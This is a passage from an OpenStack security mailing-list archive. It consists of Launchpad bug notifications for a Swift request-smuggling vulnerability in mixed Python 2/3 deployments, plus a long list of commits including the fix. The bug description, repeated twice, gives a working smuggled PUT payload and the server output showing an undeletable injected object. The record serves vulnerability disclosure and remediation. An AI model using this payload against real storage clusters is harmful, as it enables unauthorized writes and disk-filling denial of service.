0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From 1840507 at bugs.launchpad.net Sat Oct 5 04:04:41 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Sat, 05 Oct 2019 04:04:41 -0000 Subject: [Openstack-security] [Bug 1840507] Fix proposed to swift (feature/losf) References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157024828138.22579.14176622263054177134.malone@gac.canonical.com> Fix proposed to branch: feature/losf Review: https://review.opendev.org/686864 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1840507 at bugs.launchpad.net Sat Oct 5 05:38:54 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Sat, 05 Oct 2019 05:38:54 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157025393478.1047.7914861800521921871.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/686864 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=bfa8e9feb51f2b10adfec3a741661a76fcf73216 Submitter: Zuul Branch: feature/losf commit cb76e00e90aea834c8f3dd8a6ca5131acd43663b Author: OpenStack Proposal Bot Date: Fri Oct 4 07:05:07 2019 +0000 Imported Translations from Zanata For more information about this automatic import see: https://docs.openstack.org/i18n/latest/reviewing-translation-import.html Change-Id: I40ce1d36f1c207a0d3e99a3a84a162b21b3c57cf commit 527a57ffcdefc03a5080b07d63f0ded319e08dfe Author: OpenStack Release Bot Date: Thu Oct 3 16:35:36 2019 +0000 Update master for stable/train Add file to the reno documentation build to show release notes for stable/train. Use pbr instruction to increment the minor version number automatically so that master versions are higher than the versions on stable/train. Change-Id: Ia93e0b690f47c6231423a25dfd6a108a60378a21 Sem-Ver: feature commit 8a4becb12fbe3d4988ddee73536673d6f55682dd Author: Tim Burke Date: Fri Sep 27 15:18:59 2019 -0700 Authors/changelog for 2.23.0 Also, make some CHANGELOG formatting more consistent. Change-Id: I380ee50e075a8676590e755f24a3fd7a7a331029 commit bf9346d88de2aeb06da3b2cde62ffa6200936367 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 Fix some request-smuggling vectors on py3 A Python 3 bug causes us to abort header parsing in some cases. We mostly worked around that in the related change, but that was *after* eventlet used the parsed headers to determine things like message framing. As a result, a client sending a malformed request (for example, sending both Content-Length *and* Transfer-Encoding: chunked headers) might have that request parsed properly and authorized by a proxy-server running Python 2, but the proxy-to-backend request could get misparsed if the backend is running Python 3. As a result, the single client request could be interpretted as multiple requests by an object server, only the first of which was properly authorized at the proxy. Now, after we find and parse additional headers that weren't parsed by Python, fix up eventlet's wsgi.input to reflect the message framing we expect given the complete set of headers. As an added precaution, if the client included Transfer-Encoding: chunked *and* a Content-Length, ensure that the Content-Length is not forwarded to the backend. Change-Id: I70c125df70b2a703de44662adc66f740cc79c7a9 Related-Change: I0f03c211f35a9a49e047a5718a9907b515ca88d7 Closes-Bug: 1840507 commit 0217b12b6d7d6f3727a54db65614ff1ef52d6286 Author: Matthew Oliver Date: Wed Sep 4 14:30:33 2019 +1000 PDF Documentation Build tox target This patch adds a `pdf-docs` tox target that will build PDF versions of our docs. As per the Train community goal: https://governance.openstack.org/tc/goals/selected/train/pdf-doc-generation.html Add sphinxcontrib-svg2pdfconverter to doc/requirements.txt to convert our SVGs. Story: 2006122 Task: 35515 Change-Id: I26cefda80d3234df68d7152b404e0a71da74ab90 commit be41721888913320bd448b8aaa4539f3ac6d4e7c Author: Tim Burke Date: Fri Sep 27 16:18:00 2019 -0700 Add experimental job to test upgrades from stein Also, correct the version that we check out when upgrading from stable branches. Change-Id: Ie733bc50466c66d6e6eb5c6bd42e42a05ef88798 commit 9a33365f064c2fbde732780982e3d324b488e677 Author: Tim Burke Date: Fri Sep 27 11:04:43 2019 -0700 py3: Allow percentages in configs Previously, configs like fallocate_reserve = 1% would cause a py3 backend server to fail to start, complaining like configparser.InterpolationSyntaxError: Error in file /etc/swift/object-server/1.conf.d: '%' must be followed by '%' or '(', found: '%' This could also come up in proxy-server configs, with things like percent signs in tempauth password. In general, we haven't really thought much about interpolation in configs. Python's default ConfigParser has always supported it, though, so we got it "for free". On py2, we didn't really have to think about it, since values like "1%" would pass through just fine. (It would blow up a SafeConfigParser, but a normal ConfigParser only does replacements when there's something like a "%(opt)s" in the value.) On py3, SafeConfigParser became ConfigParser, and the old interpolation mode (AFAICT) doesn't exist. Unfortunatley, since we "supported" interpolation, we have to assume there are deployments in the wild that use it, and try not to break them. So, do what we can to mimic the py2 behavior. Change-Id: I0f9cecd11f00b522a8486972551cb30af151ce32 Closes-Bug: #1844368 commit ad7f7da32d6f90aa49873f1021d18cd54daef102 Author: Tim Burke Date: Mon Aug 5 14:51:14 2019 -0700 py3: decode stdout from backgrounded servers Otherwise, when we go to print() it, we get a bunch of b"" strings. Change-Id: If62da0b4b34b9d1396b5838bf79ff494679f1ae3 commit e9cd9f74a5264f396783ca2a4548a3da7cee7bff Author: Matthew Oliver Date: Mon Aug 12 16:16:17 2019 +1000 sharder: Keep cleaving on empty shard ranges When a container is being cleaved there is a possiblity that we're dealing with an empty or near empty container created on a handoff node. These containers may have a valid list of shard ranges, so would need to cleave to the new shards. Currently, when using a `cleave_batch_size` that is smaller then the number of shard ranges on the cleaving container, these containers will have to take a few shard passes to shard, even though there maybe nothing in them. This is worse if a really large container is sharding, and due to being slow, error limitted a node causing a new container on a handoff location. This empty container would have a large number of shard ranges and could take a _very_ long time to shard away, slowing the process down. This patch eliminates the issue by detecting when no objects are returned for a shard range. The `_cleave_shard_range` method now returns 3 possible results: - CLEAVE_SUCCESS - CLEAVE_FAILED - CLEAVE_EMPTY They all are pretty self explanitory. When `CLEAVE_EMPTY` is returned the code will: - Log - Not replicate the empty temp shard container sitting in a handoff location - Not count the shard range in the `cleave_batch_size` count - Update the cleaving context so sharding can move forward If there already is a shard range DB existing on a handoff node to use then the sharder wont skip it, even if there are no objects, it'll replicate it and treat it as normal, including using a `cleave_batch_size` slot. Change-Id: Id338f6c3187f93454bcdf025a32a073284a4a159 Closes-Bug: #1839355 commit f56071e57392573b7aea014bba6757a01a8a59ad Author: Clay Gerrard Date: Wed Sep 25 15:58:50 2019 -0500 Make sharding methods with only one job Change-Id: Id1e9a9ee316517923907bf0593e851448528c75c commit 50255de0e3def868e958bfdf4aea9f4cc606e744 Author: Tim Burke Date: Mon Sep 23 16:21:36 2019 -0700 func tests: Add more UTF8 tests for versioning Change-Id: I7ac111bd8b57bd21c37f4c567a20e2c12957b2ff commit 6271d88f9ed5e98f989a6739a75b268537fe0521 Author: Thiago da Silva Date: Fri Aug 23 19:14:37 2019 +0200 Add func test for changing versionining modes Users are able to change versioning in a container from X-Versions-Location to X-History-Location, which affects how DELETEs are handled. We have some unit tests that check this behavior, but no functional tests. This patch adds a functional test that helps us understand and document how changing modes affects the handling of DELETE requests. Change-Id: I5dbe5bdca17e624963cb3a3daba3b240cbb4bec4 commit 9495bc0003817805750dd78f3d93dd1a237f1553 Author: Tim Burke Date: Thu Sep 19 16:52:41 2019 -0700 sharding: Update probe test to verify CleavingContext cleanup Change-Id: I219bbbfd6a3c7adcaf73f3ee14d71aadd183633b Related-Change: I1e502c328be16fca5f1cca2186b27a0545fecc16 commit 370ac4cd70489a49b2b6408638c9b35006f57053 Author: Matthew Oliver Date: Sat Sep 21 16:06:24 2019 +1000 Sharding: Use the metadata timestamp as last_modified This is a follow up patch from the cleaning up cleave context's patch (patch 681970). Instead of tracking a last_modified timestamp, and storing it in the context metadata, use the timestamp we use when storing any metadata. Reducing duplication is nice, but there's a more significant reason to do this: affected container DBs can start getting cleaned up as soon as they're running the new code rather than needing to wait for an additional reclaim_age. Change-Id: I2cdbe11f06ffb5574e573c4a60ba4e5d41a00c50 commit 291873e784aeac30c2adcaaaca6ab43c2393b289 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 proxy: Don't trust Content-Length for chunked transfers Previously we'd - complain that a client disconnected even though they finished their chunked transfer just fine, and - on EC, send a X-Backend-Obj-Content-Length for pre-allocation even though Content-Length doesn't determine request body size. Change-Id: Ia80e595f713695cbb41dab575963f2cb9bebfa09 Related-Bug: 1840507 commit 81a41da5420313f9cdb9c759bbb0f46c0d20c5af Author: Matthew Oliver Date: Fri Sep 13 16:16:06 2019 +1000 Sharding: Clean up old CleaveConext's during audit There is a sharding edge case where more CleaveContext are generated and stored in the sharding container DB. If this number get's high enough, like in the linked bug. If enough CleaveContects build up in the DB then this can lead to the 503's when attempting to list the container due to all the `X-Container-Sysmeta-Shard-Context-*` headers. This patch resolves this by tracking the a CleaveContext's last modified. And during the sharding audit, any context's that hasn't been touched after reclaim_age are deleted. This plus the skip empty ranges patches should improve these handoff shards. Change-Id: I1e502c328be16fca5f1cca2186b27a0545fecc16 Closes-Bug: #1843313 commit 20fc16e8daa184ebadab9f49e0f76e7687a8cebd Author: Thiago da Silva Date: Tue Sep 17 18:57:35 2019 +0200 Close leaking opened requests Change-Id: I3d96022c01834c85e9795ea41d18b17624a33a19 Co-Authored-By: Tim Burke commit 9698b1bb957c1f646ac30fb64ec3528627fcee1c Author: Thiago da Silva Date: Tue Sep 17 16:52:55 2019 +0200 Skip test when object versioning is not enabled Change-Id: I671a6e4a3d1011dbbc2267b44134cfaf3380fb22 commit 75c9c636f2c637b0f36c705957f2204de6e405d0 Author: Ghanshyam Mann Date: Tue Sep 17 04:47:45 2019 +0000 [train][goal] Run 'tempest-ipv6-only' job in gate As part of Train community goal 'Support IPv6-Only Deployments and Testing'[1], Tempest has defined the new job 'tempest-ipv6-only'(adding in Depends-On patch) which will deploy services on IPv6 and run smoke tests and IPv6 related tests present in Tempest. This job will be part of Nova, Neutron, Cinder, Keystone, Glance, Swift gate. Verification structure will be: - 'devstack-IPv6' deploy the service on IPv6 - 'devstack-tempest-ipv6' run will verify the IPv6-only setting and listen address - 'tempest-ipv6-only' will run the smoke + IPv6 related test case. This commit adds the new job 'tempest-ipv6-only' run on gate. Story: #2005477 Task: #35932 [1] https://governance.openstack.org/tc/goals/train/ipv6-support-and-testing.html Change-Id: I78be2ee5a7f1e5d3188ece98d7d8324f1c9bd0e3 commit b4288b4aa6e6be2222f5f0e9ca8360c07040d5c0 Author: Nguyen Quoc Viet Date: Thu Sep 12 11:31:42 2019 +0700 versioned_writes: checks for SLO object before copy Previously, versioned_writes middleware copy an already existing object using PUT. However, SLO requires the additional query to properly update the object size when listing. Propose fix: In _put_versioned_obj - which is called when on creating version obj and also on restoring obj, if 'X-Object-Sysmeta-Slo-Size' header is present it will add needed headers for container to update obj size Added a new functional test case with size assertion for slo Change-Id: I47e0663e67daea8f1cf4eaf3c47e7c8429fd81bc Closes-Bug: #1840322 commit db8b0b6bc46a67b03af415d4e5e1429cc7d73bba Author: Clay Gerrard Date: Fri May 10 13:15:42 2019 -0500 Make ceph tests more portable Change-Id: If93325f2651a02f98f9d480c10bf7b849cc9617e commit 3960df983b68cd5baa84cac9a4d0b61f08737c09 Author: Andreas Jaeger Date: Fri Sep 13 09:38:22 2019 +0200 Remove unneeded Zuul branch matcher We have implicit branch matchers, so there's no need to add a check for not-ocata etc, a job is only run for the branch it's on - like master now. Remove it to not confuse Zuul when multiple branches matches and the job definition is different. Change-Id: I6a346c9141aad1aa8a7393c899d5571057073e7a commit 49f62f6ab7fd1b833e9b5bfbcaafa4b45b592d34 Author: Tim Burke Date: Thu Sep 12 10:59:08 2019 -0700 bufferedhttp: ensure query params are properly quoted Recent versions of py27 [1] have begun raising InvalidURL if you try to include non-ASCII characters in the request path. This was observed recently in the periodic checks of stable/ocata and stable/pike. In particular, we would spin up some in-process servers in test.unit.proxy.test_server.TestSocketObjectVersions and do a container listing with a prefix param that included raw (unquoted) UTF-8. This query string would pass unmolested through the proxy, tripping the InvalidURL error when bufferedhttp called putrequest. More recent versions of Swift would not exhibit this particular failure, as the listing_formats middleware would force a decoding/re-encoding of the query string for account and container requests. However, object requests with errant query strings would likely be able to trip the same error. Swift on py3 should not exhibit this behavior, as we so thoroughly re-write the request line to avoid hitting https://bugs.python.org/issue33973. Now, always parse and re-encode the query string in bufferedhttp. This prevents any errors on object requests and cleans up any callers that might use bufferedhttp directly. [1] Anything after https://github.com/python/cpython/commit/bb8071a; see https://bugs.python.org/issue30458 Closes-Bug: 1843816 Change-Id: I73f84b96f164e6fc5d3cb890355871c26ed271a6 Related-Change: Id3ce37aa0402e2d8dd5784ce329d7cb4fbaf700d Related-Change: Ie648f5c04d4415f3b620fb196fa567ce7575d522 commit 1ded0d6c8793ca3eca573c098cef78b5ae41f080 Author: Tim Burke Date: Thu Oct 11 15:23:39 2018 -0700 Allow arbitrary UTF-8 strings as delimiters in listings AWS seems to support this, so let's allow s3api to do it, too. Previously, S3 clients trying to use multi-character delimiters would get 500s back, because s3api didn't know how to handle the 412s that the container server would send. As long as we're adding support for container listings, may as well do it for accounts, too. Change-Id: I62032ddd50a3493b8b99a40fb48d840ac763d0e7 Co-Authored-By: Thiago da Silva Closes-Bug: #1797305 commit 4cafc3d656098d13c46cd83d94b44c8801c5eb2b Author: CY Chiang Date: Thu Sep 5 16:09:23 2019 +0800 doc: Fix the swift middleware doc needs more info to set s3 api Modify the AWS S3 Api section in middleware document. Add how to create ec2 credential and minimun configuration to use s3 api. Change-Id: Id4d614d8297662f16403fdfe526e14714a21249d Closes-Bug: #1842884 commit 1d7e1558b3b422073918b89df21f703215bd1e33 Author: Tim Burke Date: Tue Jul 16 17:01:19 2019 -0700 py3: (mostly) port probe tests There's still one problem, though: since swiftclient on py3 doesn't support non-ASCII characters in metadata names, none of the tests in TestReconstructorRebuildUTF8 will pass. Change-Id: I4ec879ade534e09c3a625414d8aa1f16fd600fa4 commit c71bb2506310438b011818a44449daea500863fd Author: Tim Burke Date: Fri Aug 30 21:40:03 2019 -0700 diskfile: Add some argument validation Either all or none of account, container, and object should be provided. If we get some but not all, that's indicating some kind of a coding bug; there's a chance it may be benign, but it seems safer to fail early and loudly. Change-Id: Ia9a0ac28bde4b5dcbf6e979c131e61297577c120 Related-Change: Ic2e29474505426dea77e178bf94d891f150d851b commit e6e31410e093b426bfa5b9a2094be56c8406b6a2 Author: Tim Burke Date: Fri Aug 30 11:54:47 2019 -0700 Find .d pid files with swift-orphans Change-Id: I7a2f19862817abf15e51463bd124293730451602 commit 3e4efb7aa4662a5f915caab5bef3de6dd17e3e19 Author: Tim Burke Date: Thu Aug 29 16:55:27 2019 -0700 py3: Update Getting Started docs Change-Id: I94050c40585b397a9f7bab1e48650b89f70ab24d commit 4d83b9b95e32038390dbdc66d93c36c929dbce2a Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 tests/py3: Improve header casing Previously, our unit tests with socket servers would let eventlet capitalize headers on the way out, which - isn't something we want to have eventlet do, because it - breaks unicode-in-header-names on py3, so it - is already disabled in swift.common.wsgi.run_server() for real servers. Include a test to make sure we don't forget about it in the future. Change-Id: I0156d0059092ed414b296c65fb70fc18533b074a commit a32fb30c16062ea64488e918077d635645e33e47 Author: Ondřej Nový Date: Mon Aug 20 10:11:15 2018 +0200 Use SOURCE_DATE_EPOCH in docs to make build reproducible Set copyright year and html_last_updated_fmt to SOURCE_DATE_EPOCH if it's set. See https://reproducible-builds.org/specs/source-date-epoch/ This patch make build reproducible, see https://reproducible-builds.org/ Change-Id: I730a8265ca2c70c639ef77a613908e84eb738b70 commit 2545372055922abd681ef665f9040590d2f5806c Author: Tim Burke Date: Fri Aug 16 20:37:10 2019 -0700 py3: Switch swift-dsvm-functional-py3 to run tests under py3 Now that all of the func tests are ported, we may as well run all-py3. Change-Id: Ib9f75ca9efb46dc4c7730ad2718228ec7777c924 commit 74db3670607d952e597011eb07676aedff521b41 Author: Tim Burke Date: Wed Aug 7 16:16:57 2019 -0700 py3: Finish porting func tests We were (indirectly) importing swiftclient (and therefore requests and urllib3) before doing our eventlet monkey-patching. This would lead boto3 (which digs an SSLContext out of urllib3) to trip RecursionErrors on py3 similar to >>> from ssl import SSLContext, PROTOCOL_SSLv23 >>> import eventlet >>> eventlet.monkey_patch(socket=True) >>> SSLContext(PROTOCOL_SSLv23).options |= 0 Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) [Previous line repeated 330 more times] RecursionError: maximum recursion depth exceeded while calling a Python object Change-Id: I4bb59edd87336597791416c4f2a096efe0e72fe3 commit 3750285bc863f8b6b56ba9526b028ee9cddcf04b Author: Tim Burke Date: Tue Jul 16 16:24:14 2019 -0700 py3: fix up listings on sharded containers We were playing a little fast & loose with types before; as a result, marker/end_marker weren't quite working right. In particular, we were checking whether a WSGI string was contained in a shard range, while ShardRange assumes all comparisons are against native strings. Now, get everything to native strings before making comparisons, and get them back to wsgi when we shove them in the params dict. Change-Id: Iddf9e089ef95dc709ab76dc58952a776246991fd commit a48dd1950d2999cb7fdc2856a827da4780715b1e Author: Tim Burke Date: Mon Aug 5 14:48:54 2019 -0700 Allow non-default domain to be used in func tests Change-Id: I7afa7e367103bb9caaf74788a49cd055eca53cf6 commit f1b44b199a064c3715c4b0e1e4067ec8235cf18d Author: Tim Burke Date: Fri Mar 29 13:54:30 2019 -0700 s3api: paginate listings when aborting MPUs Even when your cluster's configured funny, like your container_listing_limit is too low, or your max_manifest_segments and max_upload_part_num are too high, an abort should (attempt to) clean up *all* segments. Change-Id: I5a57f919cc74ddb08bbb35a7d852fbc1457185e8 commit c0035ed82e52756c9c04097fabba561a86da200a Author: CY Chiang Date: Tue Jul 30 11:42:45 2019 +0800 Update the bandit.yaml available tests list According to the bandit current version document, the B109 and B111 plugin has been removed. And Add the following tests: Complete Test Plugin Listing: B507, B610, B611, B703 Blacklist Plugins Listing: B322, B323, B325, B413, B414 Reference URL: https://bandit.readthedocs.io/en/latest/plugins/index.html Change-Id: I5e9365f9147776d7d90c6ba889acbde3c0e6c19d Closes-Bug: #1838361 commit 6853616aeaa7a6b14fd1ae99a507ab1761d16609 Author: Tim Burke Date: Fri Jul 12 15:17:34 2019 -0700 ring: Track more properties of the ring Plumb the version from the ringbuilder through to the metadata at the start of the ring. Recover this (if available) when running swift-ring-builder write_builder When we load the ring, track the count and MD5 of the bytes off disk, as well as the number of uncompressed bytes. Expose all this new information as properties on the Ring, along with - device_count (number of non-None entries in self._devs), - weighted_device_count (number of devices that have weight), and - assigned_device_count (number of devices that actually have partition assignments). Co-Authored-By: Matthew Oliver Change-Id: I73deaf6f1d9c1d37630c37c02c597b8812592351 commit 0fec28ab155276d099d1d4c9fd377f3da539077b Author: zhufl Date: Wed Jul 3 16:41:38 2019 +0800 Fix invalid assert states This is to fix invalid assert states like: self.assertTrue('sync_point2: 5', lines.pop().strip()) self.assertTrue('sync_point1: 5', lines.pop().strip()) self.assertTrue('bytes: 1100', lines.pop().strip()) self.assertTrue('deletes: 2', lines.pop().strip()) self.assertTrue('puts: 3', lines.pop().strip()) self.assertTrue('1', jobs_to_delete[0]['partition']) in which assertEqual should be used. Change-Id: Ide5af2ae68fae0e5d6eb5c233a24388bb9942144 commit 03512e001d95adadfea147e8a4051fce0aa9dfca Author: pengyuesheng Date: Wed Jul 3 15:06:31 2019 +0800 Update the constraints url For more detail, see http://lists.openstack.org/pipermail/openstack-discuss/2019-May/006478.html Change-Id: I95114c4aa670c07491d5a15db2341f65cb0d1344 commit 5270da86e6eead273f58a24cba65b951550e3037 Author: pengyuesheng Date: Tue Jul 2 10:59:28 2019 +0800 Add python3 to setup.cfg Change-Id: I5dd57aad794c050c44e328c43346be0063170492 commit 4aa71aa25caed34f36fafe2de025425aa1d1e0b2 Author: Kota Tsuyuzaki Date: Tue Oct 9 16:42:18 2018 -0700 We don't have to keep the retrieved token anymore Since the change in s3_token_middleware to retrieve the auth info from keystone directly, now, we don't need to have any tokens provided by keystone in the request header as X-Auth-Token. Note that this makes the pipeline ordering change documented in the related changes mandatory, even when working with a v2 Keystone server. Change-Id: I7c251a758dfc1fedb3fb61e351de305b431afa79 Related-Change: I21e38884a2aefbb94b76c76deccd815f01db7362 Related-Change: Ic9af387b9192f285f0f486e7171eefb23968007e commit eed76d8bed446518bff2ca4af18259f7637c430e Author: arzhna Date: Wed Nov 28 11:15:05 2018 +0900 Fix a potential bug In the class method from_hash_dir(), the arguments to input when creating an instance of the BaseDiskFile class are incorrect. The __init__() method of BaseDiskFile class receive the arguments in order of mgr, device_path, partition and etc. However, in from_hash_dir() method, the order of arguments are mgr, device_path, None and partition The class method from_hash_dir() is used by the Object Auditor. If the partition argument is used in the new DiskFile implementations, exception may occur. It will be cause object auditing to failed and the object will be quarantine by the Object Auditor. Closes-Bug: #1805539 Change-Id: Ic2e29474505426dea77e178bf94d891f150d851b ** Tags added: in-feature-losf ** Bug watch added: Python Roundup #33973 http://bugs.python.org/issue33973 ** Bug watch added: Python Roundup #30458 http://bugs.python.org/issue30458 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to 